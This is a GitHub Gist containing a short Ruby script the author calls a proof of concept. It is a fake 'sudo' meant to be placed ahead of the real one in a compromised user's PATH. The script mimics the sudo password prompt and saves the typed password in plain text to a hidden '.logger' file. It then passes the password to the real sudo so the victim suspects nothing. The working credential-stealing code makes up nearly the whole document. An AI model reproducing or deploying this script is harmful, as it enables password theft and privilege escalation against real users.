Last active
August 29, 2015 14:08
-
-
Save r3k2/a6007be054460eedfcb2 to your computer and use it in GitHub Desktop.
fake sudo to grab local user passwords when you already have access at user level.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| # HISPAGATOS.org | |
| # probe of comcept to capture user password. | |
| # when attacker compromise a regular use shell account, he can | |
| # jump into root or steal user password by adding into the user enviroment | |
| # the path where this sudo script sits example PATH=/theplace:$PATH etc notice that is BEFORE | |
| # the rest of the path entries so any program in this path will run BEFORE the real program. | |
| # [email protected] http://hispagatos.org | |
| require 'io/console' | |
| def promp() | |
| username = ENV['LOGNAME'] | |
| STDOUT.flush | |
| print "[sudo] password for #{username}: " | |
| p = STDIN.noecho(&:gets).chomp | |
| end | |
| ARGUMENTS = ARGV.join(' ') | |
| paso = promp() | |
| File.open('.logger', 'w') do |you| | |
| you.puts(paso) | |
| end | |
| cmd = "echo '#{paso}' | sudo -kS "+ARGUMENTS | |
| exec cmd |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Did this in 10 m to probe the concept to a coworker.